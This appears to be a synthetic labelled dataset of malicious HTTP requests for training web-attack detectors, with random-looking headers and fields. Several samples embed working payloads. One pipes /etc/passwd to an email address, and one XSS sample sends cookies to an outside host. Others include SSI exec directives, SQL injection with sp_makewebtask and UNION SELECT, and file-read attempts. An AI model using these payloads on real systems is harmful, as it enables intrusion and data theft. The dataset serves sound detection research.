Cache-Control: no-cache
Client-ip: 141.187.117.244
Cookie: GRa=ate16tibiiss;thGsee8a=(esws;inputpSp3=9536869;na=ssd5eaxo;onaCE=divlqaOsock_streamiiM;wexr214af81=lR
Cookie2: $Version="379"
Date: Thu, 02 Dec 04 02:21:07 UTC
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: 100-continue
From: eedz@idneeachi.org
If-Modified-Since: Sun, 21 Mar 10 21:18:27 GMT
If-Unmodified-Since: Sat, 22 Jul 06 11:14:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4023
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: msqj1 teTt=oUahvo
Authorization: edzh nuUs2osn=ijuohy
Range: 7-
Referer: /Rhhi5tnl/hrycnrh/ovnRd.php4
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept-Language
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 4.0; ii-br; rv:0.8.9) Gecko/97403606
UA-CPU: Sparc
UA-Disp: 1821,609,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 343x5234
Via: 8.1 www.ddenNs.png, 8.2 49.250.97.224
Transfer-Encoding: 7ledo6; torge2=rhneoOt
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 40.116.222.105
X-Serial-Number: 323337935267147
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38771
Start - Id: 42929
class: OsCommanding
GET /zALaXRSac-rW@26sEv/inoy5ne6e8RhsnrtQe/swsiiE/s6.swf?rtsanc9jOkHengh=mti&yu2lksteda=twl.kj_A1dV&8w3L=8410332&mci=b91&aoitcm7=343520&mtwdR9ej=oe8Lioa%5Do&shsl5xfoah=Atots5ohuePani HTTP/1.0
Host: www.zoreyooa.biz
Connection: yraua
Accept: audio/x-wav
Accept-Charset: windows-1250, koi8, windows-1250, iso-2022-kr
Accept-Encoding: gzip;q=0.1
Accept-Language: 5Vnesuf-DrNbe;q=0.8, leatoe-ent0rdo;q=0.2, h-4eoc;q=0.3
Cache-Control: only-if-cached
Date: Mon, 09 Nov 09 09:33:01 GMT
Expect: 100-continue
If-Match: *
Max-Forwards: 7
Range: 01418-88080,370072-
Referer: /tOeuooto/trIe.pl
Trailer: Pragma
User-Agent: oops   ;    cat   /etc/passwd|     mail your@sdanf.com
Transfer-Encoding: identity

null

End - Id: 42929
Start - Id: 48523
class: XPathInjection
POST /cy/St7lriykcohneboa6uH/u37xo9/njnD1/CEhttp_b7FdJd/6m7WJbiE43UhtpassFe/lvyoy/rRLIj/WM/6lakiiefAP0t/egRa7OH9aLK50@.cgi? HTTP/1.0
Content-Length: 363
Content-Language: 4m,t
Content-Encoding: compress
Content-Location: http://2aePmse.de/c6Oooje.swf
Content-MD5: dFluOG9kcXZveXVndWVydQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jan 06 08:22:43 UTC
Last-Modified: Fri, 24 Oct 08 19:53:13 UTC
Host: www.rtnalie.cz
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.5, iso-2022-jp;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.1
Cache-Control: min-fresh=61
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Mon, 31 Oct 05 06:16:21 GMT
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: nxpek=d4aopue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 22 Jul 05 01:47:06 UTC
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: "maUElsYH51PTTjJhGFUz"
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 11
MIME-Version: 0.8
Pragma: cfAec=y
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: Basic YXJzcjo0c20xdHQ=
Range: -97671,976035-235370,9-723
Referer: /ezhaOa/eihy.doc
TE: deflate,trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.8 (X11; U; Open BSD i586 8.1; te-3c; rv:1.6.3) Gecko/64741536
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7707x473
Via: 7.5 240.124.8.2, FTP/9.9 73.20.79.9, 0.9 97.17.163.222
Transfer-Encoding: gzip
Warning: 957 253.110.11.25 "hCgutc3eu9" 
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

Au=264   or l/feat/7tpn9s/child::node()[position()=94]   or  2=&KUVCT=uoh~T&g9srmo&chispaqg=gjeAflHA-Oiq&ErYiaayN=rpnthtsegeii&jD1ae=5qtaaI-5\ewzehe&ggesa1aaantte=9433693995&AxTo=ernueeldzsllaeji7&me=taoWstnaorSvnsm&qEwln=FDe5&oescayPqgcoheaq= d)%uincludeoVpioistvimt&38rbbsUda=8euarmosic&JOC.Botelnet=n0sF&l4hMuuetfatu=ercl;

End - Id: 48523
Start - Id: 46286
class: PathTransversal
GET /sQGr.shtml?telnet8TCzmMzICX=nnQnL&EechoVZsock_streamy_exec=f&n7s8HTjrfupzd=ehXeTpJLIK&CITeaerep=%2Fetc%2Fhttpd%2Fhttpd.conf&ta=atph%246xdstdin&hRistdkjbts=021644&hol=tizy+&0aohr7xjcdd=5thSasymahteebo&iasttisz0d3iac=2&AHyterve=gQtiee6Rsnuida&n8efua=9504182019&aeh=tya%5De+8le&aq1pazaasfsia=990O HTTP/1.1
Host: 215.190.10.126:86130
Connection: ptAap
Accept: application/*;q=0.2, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: Neenep-bOes;q=0.9, mi-p0n;q=0.5, pEbdl-soif
Cache-Control: no-cache
Client-ip: 54.146.114.194
Cookie: 4dQ=y2H4retigxeobtyism;9qaccess_logBDxmljandxp_=ectuel3rsse4msyhaq;4nlstiwIl=cconnectis;dnoeaher8=sot8tEh;6a8m=ubs6_x63d0NO
Cookie2: $Version="3"
Date: Fri, 30 Jan 09 14:39:52 CET
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "qQGXZdTgFVV2GicZ2Yz"
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 5
MIME-Version: 4.9
Pragma: f3rn7a=aaD0w
Proxy-Authorization: Ceatcl leufemEy=AhEdaAee
Authorization: NTLM SXhhM2VseG5yc2RuZGNhaW9udHR0bnRyc29pYTNhZEk=
Range: 5-,07-2
Referer: /6oai/eiihqe/n7efrcma/4h9nsobm/wakx.htm
TE: gzip;q=0.8,gzip;q=0.2
Trailer: If-Unmodified-Since
User-Agent: p9P_l- http://www.uie7b.be
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.6 215.163.107.69, 9.1 www.m4abG.shtml, 4ozf/9.8 62.151.149.157
Transfer-Encoding: dseWa; err7=sIiEEEF
Upgrade: Su9qj/8.6, baec/7.2
Warning: 600 220.161.94.186 "tlrnssiuaafuarojs" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 576547919315
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46286
Start - Id: 39879
class: SSI
GET /wEntlwhessdwoiwdcg/ripttiw/KvqcV/khC@15ZHtelnet5krvG/dceesfao6dfPAtt/eXGK.pl?iehbw3a=sUcnU&Suuneueei=a HTTP/1.1
Host: 30.167.52.47:80
Connection: keep-alive
Accept: application/zip, text/*;q=0.6
Accept-Charset: x-mac-roman;q=0.2, x-mac-roman;q=0.6, windows-1251;q=0.7
Accept-Encoding: <!--  #exec     cmd="/bin/ls -l   /home/tlrrr9iIfE/iopir4" -->
Accept-Language: yenda-ehee
Cache-Control: iltn=esoleae
Cookie: FQotw0ip=rMpq
If-Match: "kqFn.DvKLrc5jRJy"
Authorization: Digest nonce
Referer: http://www.rxsdeeom.cz/3wmdEm/p8renh/tp0Herej.nsf
User-Agent: ewJtsgelagot

null

End - Id: 39879
Start - Id: 35102
class: SqlInjection
GET /xp_.6fvs7EiGODm/qN/sekMFwK7aCIMRakt-Td/BXgkall/s6BD_tg7BF6N/Pm/t5Pz/eQJ/wQepwe1reobrq4ai/daer/eiYdmiVJ_higIF1RK9zB.jpeg?ERDnps=cdniu&lsi=ne3JZz4oO2i&y.JiGc=c1sI54Ym%40_&etcS-y=o0UpEiframeumaile4fIlia&a76houenmnoc=acceptrziT&NM-FmNEVxmlTUl=nsh&we=821133&irtw=%7Ehu8Hlt%7Ciuilceexec%26 HTTP/1.0
Host: 255.101.10.163
Connection: yjtb
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: olI-ln, t-tmtrtnda
Cache-Control: min-fresh=402
Client-ip: 186.212.136.62
Cookie: Bevces=OR     'teemeHnlP'    =   N'   ';ITxZdlusrY.7=70669
Date: Sat, 06 Nov 04 03:18:35 GMT
ETag: W/"rxq4LoFVb5IbCGNLEAl"
Expect: 100-continue
From: oells13@45fsekuw2v.gov
If-Modified-Since: Sun, 27 Mar 05 19:02:17 GMT
If-Unmodified-Since: Tue, 04 Jul 06 07:21:50 CET
If-Match: "HGsFi1H58ftZ@lv"
If-None-Match: *
If-Range: Wed, 20 Aug 08 04:30:51 CET
Max-Forwards: 644
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: 9esniq Uadtnog=kHioniye
Authorization: NTLM cmlzNW5hZWVqdHRkMXNzaXRpZWRVbGVvM1R0cmludHRp
Referer: /Sny9A6w.asp
TE: trailers,gzip;q=0.8
Trailer: Range
User-Agent: tIiClE http://www.dete.ch
UA-CPU: Sparc
UA-Disp: 6684,2731,32
UA-Color: color32
Via: 0.2 www.wotttz.png
Transfer-Encoding: compress
Warning: 874 167.83.202.83 "dOrvOwtenst7t2ivdo7" 
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35102
Start - Id: 42743
class: SqlInjection
POST /p2Hhr/@bodyRRm42ezr/rTeh40gtetgalds/cunecmeiboi1oii.htm? HTTP/1.0
Content-Length: 29
Content-Language: o6OqwNVS,t0imi,pAdnh
Content-Encoding: compress
Content-Location: http://omsmpie.biz/yttWt/5iah/iz2aooho/imLto/e5idveue.tiff
Content-MD5: cGV3Y3R0ZGRhaGlobHdydA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Dec 05 12:20:35 UTC
Last-Modified: Sat, 29 May 04 07:21:46 CET
Host: 166.246.66.169
Connection: close
Accept: */*
Accept-Charset: cp-932, iso-8859-5;q=0.0, iso-8859-1, iso-8859-9;q=0.5, windows-1253;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 133.61.102.149
Cookie: ort6iescew8caoS=72;aolmphuaf8hpfa=dily-HxRZNRg;jyperlob4ZdQ3=3XkFA0;fjincludex0boot.iniNZR2GO=xit;EKXqH@MUv7=zedeh'     UNION /**/  SELECT remlyyhn     FROM  dba_users  WHERE  6c  like    '%25
Cookie2: $Version="9"
Date: Mon, 20 Feb 06 14:16:49 CET
ETag: W/"5DjfBehqhBtt9WGZf"
Expect: 100-continue
From: olec@itnahevEod.st
If-Modified-Since: Thu, 09 Feb 06 16:57:45 UTC
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 31
MIME-Version: 2.2
Pragma: i7U='omiew'
Proxy-Authorization: npee tari=stsHdd
Authorization: rmohsa TitSo=nnawlaf
Range: 393-,35701-,-917891
Referer: http://d9ih.biz/S1vtdpu/TE1aem3l/161prr/sO7hEtts/unty.doc
TE: deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: Mozilla/1.5 (Windows; U; Win98 5.1; Ag-Ct; rv:1.0.3) Gecko/84290819
UA-CPU: MIPS
UA-Disp: 336,722,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 957x8790
Via: 3.1 www.0ae9h.shtml, HTTP/1.2 www.0eteedW.css:75230, 5.8 10.6.25.23
Transfer-Encoding: gzip
Upgrade: usuiD/4.0, 7hqfn/1.3, ua0l/0.7, ndst/6.3
Warning: 353 www.douan.shtml "yoel8er3" 
X-Forwarded-For: 235.103.6.212
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

azhau=9031956&4oTigE3eaet=prl

End - Id: 42743
Start - Id: 48968
class: XPathInjection
GET /sBbLiM/8fIcmSEMR0/rnrdehtcgs.html?yiaiitevoje0acT=msnrawgetiwinnt&etvaa3h1uyhsid=dto%27++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27iiAm%27+++%3D+%27&aatuQnuoz=uemsdlib HTTP/1.0
Host: 86.58.217.112
Connection: ehddnC
Accept: application/*, image/gif, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="6"
Date: Mon, 19 Feb 07 19:29:16 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: aaee5oT@0lekntq.de
If-Modified-Since: Wed, 12 Mar 08 04:38:12 UTC
If-Unmodified-Since: Thu, 09 Nov 06 04:32:36 UTC
If-Match: "FbroY8fbk.4kZOkT"
If-None-Match: *
If-Range: *
Max-Forwards: 7585
MIME-Version: 6.3
Pragma: e=ei
Proxy-Authorization: NTLM dG50cnJvdDJ0aWFpY29ZZWVocjRsTWxubm1hN2kwZXVhaGhjZURhbzNoYTA=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://Icroegic.uk/eoiecaab/27dqs/d9nm/1s9oti3.msf
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.3 (Windows; U; WinNT 1.7; on-us; rv:1.3.1) Gecko/16062230
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: 7.4 117.73.39.254
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48968
Start - Id: 48191
class: XSS
PUT /srS/eEbXv@6WNzvc6iPBl.Wf.mdb? HTTP/1.0
Content-Length: 126
Content-Language: o,dswsesd
Content-Encoding: compress
Content-Location: http://nnssaee.uk/tw2swt/dlan/rasenu/ntto2ta/hoqko.pdf
Content-MD5: T1VhaTI1OGlvNmVlYXBoTw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Nov 06 06:39:04 GMT
Last-Modified: Mon, 15 Oct 07 01:17:18 CET
Host: www.iicmor0r.cz
Connection: srndmf9R
Accept: */*
Accept-Charset: iso-8859-7;q=0.3, utf-7, iso-8859-15;q=0.2, windows-1251;q=0.3
Accept-Encoding: *
Accept-Language: <meta  http-equiv =    "     refresh"   content =  " 0;url=javascript: [document.location.replace('http://www.enstti.com/cgi-bin/rotoriic.cgi'+document.cookie);]   " >
Cache-Control: ho='t'
Client-ip: 4.175.115.52
Cookie: aoaon=dLtior;-RD4mY0dkb8-@=:u\;tosB6hop6moi=<
Cookie2: $Version="815"
Date: Tue, 12 Oct 04 08:53:09 UTC
ETag: W/"fHpeY1yAnsnzfzE3rW"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: MrMq@qyrhdoc.st
If-Modified-Since: Sat, 10 Feb 07 17:14:02 CET
If-Unmodified-Since: Fri, 27 Feb 04 24:14:58 GMT
If-Match: "z8mHRgCQXuZfa80Obkm"
If-None-Match: *
If-Range: *
Max-Forwards: 7669
MIME-Version: 0.6
Pragma: e='rq9eft'
Proxy-Authorization: Digest cnonce="sTcbsOs"
Authorization: Basic c2JsbmFIczplbnJh
Range: 4-7,-93,820296-262758
Referer: /s8dao.js
TE: trailers,chunked
Trailer: Range
User-Agent: aol3i5 (3BPqHBuu8_; ly@6E5sw6v; w_TqvYc-U3)
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 239x769
Via: 0.5 www.p9rtmsd.png:958, 2.8 www.cFenlr9o.png, HTTP/3.9 46.157.64.155
Transfer-Encoding: compress
Upgrade: aoeb/1.7, cdhrc/3.3
Warning: 485 48.192.206.24 "Beiucn" 
X-Forwarded-For: 14.254.128.231
X-Serial-Number: 1417997489185610927
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

YYsZ=divin6laxoueErhe&HyVe8=Iah&7funEiahtna=536&ah3tu5d3umme4=hx/n&stfme9See=10&wkdth=ti8hgAwp-xmlopen@6i&roiiryejrimth=09

End - Id: 48191
Start - Id: 40433
class: SSI
POST /mq6@xvUb/ogrAxk-_7IhaHQ9_fWd/DbinqOahttpYT/e8qf4tBHSEXG/t1Q5.X3bb.q.js? HTTP/1.0
Content-Length: 184
Content-Language: tenm7oe7,jimh
Content-Encoding: gzip
Content-Location: http://www.gReslbn.fr/neeooca2/8swueTL.swf
Content-MD5: bnRFaWZhZTZlbjNldDFyaQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 11 Feb 07 04:00:48 GMT
Host: www.ttves0Hr.be:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-7, x-mac-chinesetrad;q=0.8, x-mac-japanese;q=0.6, us-ascii;q=0.2, isiri-3342
Accept-Encoding: gzip;q=0.4, compress;q=0.9, compress;q=0.6
Accept-Language: *;q=0.3
Cache-Control: ge=o3bukei
Client-ip: 216.241.175.64
Cookie: 89%uEfS2Ikj=e%3Feahttpsn+%2Fhroupasswdo+sperls
Cookie2: $Version="28"
Date: Thu, 25 Jan 07 06:41:43 GMT
From: 7UseiIn@dhxnetcel.fr
If-Modified-Since: Wed, 01 Apr 09 24:11:45 UTC
If-Unmodified-Since: Wed, 08 Feb 06 22:41:34 GMT
If-Match: *
If-None-Match: *
If-Range: "d3_-lFS6vOLvn5GB"
Max-Forwards: 4650
MIME-Version: 8.5
Pragma: une='eaoyn3'
Referer: /pcevialr/ii9bi/olnl/eUi7to4i.gif
User-Agent: ihd5otdk6 (hYbwYJi)
UA-Disp: 477,071,32
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~

qharcn7aeeoed6=t<%replace&AtIDnvu=tarr&eE1nH94y3x=5 vEscriptewdiy&l4&hersnuHac9srua=ndfdropsxqn0aa&SK5F39=<!--   #include     virtual="c:\winnt\system.ini"-->

End - Id: 40433
Start - Id: 41013
class: SqlInjection
PUT /1SaOezirskkmreusRtn/5iX1iqJ@m/eytzo2bPkpH/hvbvnq.oGWGY3/xH5-SB/stpehtppek/ooldahugsdouadenE/hyw7era.tiff? HTTP/1.1
Content-Length: 416
Content-Language: looquih,f9iiBee,twvta15c
Content-Encoding: deflate
Content-Location: http://nh3w.de/tTcaesba.bin
Content-MD5: YXJlbHJlaWJFbnVlZW9mcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Jun 06 10:44:20 GMT
Last-Modified: Fri, 20 Jan 06 04:12:01 GMT
Host: www.onevSioNh.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: euc-tw, x-mac-cyrillic;q=0.4, windows-1250, hz-gb-2312
Accept-Encoding: deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 168.241.203.79
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Wed, 11 Mar 09 18:24:37 UTC
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eddo4bhd@tahahlyhn9.org
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Fri, 22 Jul 05 11:02:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jul 06 23:25:34 UTC
Max-Forwards: 3153
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: stso6 ogso9=thaamu
Authorization: Digest uri=/unEi1at/na7irijs/csts.jsp
Referer: /isiR/tnefne/eltr/mc8s5a/t7j0ld.php
TE: deflate
Trailer: Expect
User-Agent: keHrzltb (llX2O.EmD; nLVE@L; eEmW5R)
UA-CPU: x86
UA-Disp: 856,630,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 892x2342
Via: HTTP/2.4 www.4sogb3n.jpeg, HTTP/4.4 www.fosr.shtml, 9.5 210.16.219.54
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 3513776009500054162
----: ---------------
~~~~~: ~~~~~~~~~~~~

rdgedeiiphsq=t5AM2WzoAV&Hkm=37028813&Ba2@=eROfromqgn &li2enyrq8ml=(ervariec7s&re1oRube9en4iya=t+iztgnp&aeEungtsotDsc=46976&hr0=iLp.&nhoiN8E2retnade='; EXEC    master..sp_makewebtask  "\\246.246.23.6\dt1ae\wtmia4.tiff",    "SELECT *    FROM     INFORMATION_SCHEMA.TABLES"&ne1rda0aaniitt0=485409&goRxaK=rlsiuRb&jn5dw1re24ooeoe=17128339&vidaedL1ts=oar7orog aW%ehet&r4m=enN&5nsfnal=odqtvoenwt

End - Id: 41013
Start - Id: 43582
class: OsCommanding
GET /FloeEth/FihnTtedey5.tiff?0i2Noeeerenl9so=ei%3CwI2xhded&wgetIO9pB=nnznS&ese6webtphx5l=ls+++-las+%2Fhome%2F+++++%7C&Eire=eqnetratftO&ZFrcnebtcx=0614&otta=%3E%27ces&riapraebet=80&tjoc9Xshhndran=w4SCtlPYyn HTTP/1.1
Host: www.HeWihibfn.biz
Connection: dhtlis
Accept: application/x-tar;q=0.5, video/*
Accept-Charset: x-mac-greek, x-mac-turkish;q=0.5, euc-cn, iso-8859-7, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=80040
Client-ip: 43.226.69.253
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="7"
Date: Sat, 09 Jan 10 09:26:55 GMT
ETag: "z@VDwv-LBAonIc6"
Expect: rttt=uyHbwh7I
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 01 Oct 05 23:54:45 UTC
If-Unmodified-Since: Thu, 25 Dec 08 06:11:52 UTC
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 2382
MIME-Version: 0.2
Pragma: dHfeh=i6D
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: NTLM YmlldGJMZTRhOWhhaTN0U3J4aURyaHJlZWFTM3lhSG9vdHR0ckFp
Range: 08647-744
Referer: http://www.xaednkid.gov/pieruwe/emdi/aZld0a/rre6/aDtty.wmn
TE: chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: eCn2la/7.7
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 881x134
Via: FTP/6.6 www.tsnjM4ci.css:855, 0.4 243.144.177.121:23466, 6.0 203.235.97.34:6143
Transfer-Encoding: gzip
X-Forwarded-For: 171.91.103.182
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43582
Start - Id: 43289
class: OsCommanding
GET /iFgZy7@IOWdA6M8.3WBx/mRdzyiqEsik/bOfnv0/eXd51d.7cekK/qrIS.l/qBP/qpay/psC-j8yn@@EfS4vai/6sn_PbmtNm/mochar@8BC/hI16bonyt/aba.exe?betpataj=h&RX_ZXeBeElikemD=t4u&trL=1&sznnte5nt=dwta&eoo=%5Cn++++uftp++++-p++www.onesnielol.com++%2Fonal%2Fsttemenede%2Forri%2Fvetile%2For%2Fat HTTP/1.1
Host: 57.215.33.60
Connection: rDeoimop
Accept: audio/x-wav;q=0.8
Accept-Charset: x-mac-roman, utf-7;q=0.6, iso-8859-9;q=0.2, iso-8859-15;q=0.0
Accept-Encoding: deflate, gzip;q=0.8, compress, identity;q=0.2
Accept-Language: be4-wsq;q=0.7
Cache-Control: max-stale
Client-ip: 41.151.127.122
Cookie: gn=eulb;ttntoi=ysT|w;eui2Hryt=yale<;9LtfnlT76fw=oiff;hIhmaroeyOdode=mateorahcchh;he8Pc1ouehtltm=9874261
Cookie2: $Version="05"
Date: Sat, 27 Mar 10 06:17:09 CET
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: Si140to
From: fztees@dntsngao.be
If-Modified-Since: Tue, 27 Apr 04 10:44:03 GMT
If-Unmodified-Since: Sun, 26 Apr 09 18:31:51 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 May 08 19:39:10 CET
Max-Forwards: 8
MIME-Version: 0.7
Pragma: tofT=avmteh
Proxy-Authorization: Digest qop=auth-int
Authorization: JatJdx oxavao=ekawLex
Range: 3300-751,9443-,-48
Referer: http://eyYA.cz/eato.nsf
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/0.6 (compatible; Ksdod; Unix; h3aIa; anlfd; hedm4hl)
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: gzip
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 78363352
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43289
Start - Id: 35028
class: SqlInjection
GET /aGtJw@/eilrhEmt/ji4P3YjSxK42SNp.mdb?Fwhk3ee5aihubyh=3oE4qR9&USasiweoolm6=7966609&VJ9ZB5sh=p3105&era=mgmocha&nes=oNhsgr%7Cn&myeSoE=707749763&aeTes=soEl&UoBs0s3EK=fpsi9&lmttamn4UmtyVt=rcs HTTP/1.1
Host: 155.248.216.206
Connection: 6ecgzh7t
Accept: audio/*, image/jpeg;q=0.8, text/xml;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale
Cookie: Stenn2auaasuhc7=8Hmdmha;9MbmhtTehmrorl=jwlrqor'8St[n7hi;0yrpN=o4ryo;EIstn='; EXEC   master.dbo.sp_makewebtask   'c:\inetpub\wwwroot\1kedvi.gif',   'SELECT ncrndh   FROM    9a WHERE    xtype=''U''';Je5zcVcC=dnhesirfiebaEbs
Date: Sun, 09 Jan 05 22:42:26 GMT
ETag: "Xe@NZhqvkk5C1Xc1F2i"
If-Unmodified-Since: Mon, 25 May 09 19:25:42 CET
If-None-Match: "VTukjGnFj0c41kNyOcw"
Authorization: Basic eTlpc2FuYnM6azZwYWgwaUU=
Range: 579614-07,76386-,87628-
Referer: /dt2rEobn/plxotun/xrad.conf
User-Agent: Mozilla/7.1 (compatible; i5d6n; Linux i586; otietfsmd; Rosp07dec)
UA-Disp: 0171,5038,8
Transfer-Encoding: compress
Upgrade: 1s1ion/6.5, 4yih/6.3, rft/0.5, pefw/2.8, Oksan/0.9
----: ------------------------------------

null

End - Id: 35028
Start - Id: 40401
class: SSI
PUT /tzK4NFiTDkza/a7I_oet2q5K.xB4wz_/h9BirawadHt/d.IA6Ga4P38f7f-4p/nhxsC0raR/OPEWY/t0MKyHRR43@Xo4iT/rh.bin? HTTP/1.1
Content-Length: 77
Content-Language: o
Content-Encoding: compress
Content-Location: http://www.ttvoed.cz/6toheh/Aotla/aCrduoe/gsd4witm/etonsp.php
Content-MD5: NG5iSWxhOXN1dGtmbnRhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 09 Mar 04 12:11:57 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: www.udeutto.net
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-15;q=0.3
Accept-Encoding: identity;q=0.7, gzip, compress;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 16.69.2.56
Cookie: bbgsoundf0=eqc8wchb3enap;pLumrLr=6s:@%
Cookie2: $Version="13"
Date: Sat, 19 Aug 06 09:38:08 UTC
ETag: "dzp3joQvsU@HpXG-X"
Expect: 100-continue
From: tTQl@hy8nl.be
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-Match: "L7cczdHEY0MKXMMgk"
If-None-Match: "5SdyTB56Xusv-C.fULwo"
If-Range: "lt2PQGjA_PLBnxQD"
Max-Forwards: 75
MIME-Version: 4.2
Pragma: no-cache
Authorization: Digest qop=tnkd
Referer: /ohisDeo.gif
TE: trailers,deflate,trailers
User-Agent: o1eS23neK1 http://www.svnuzl.biz
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: s9qavf/3.0 231.238.89.235:446
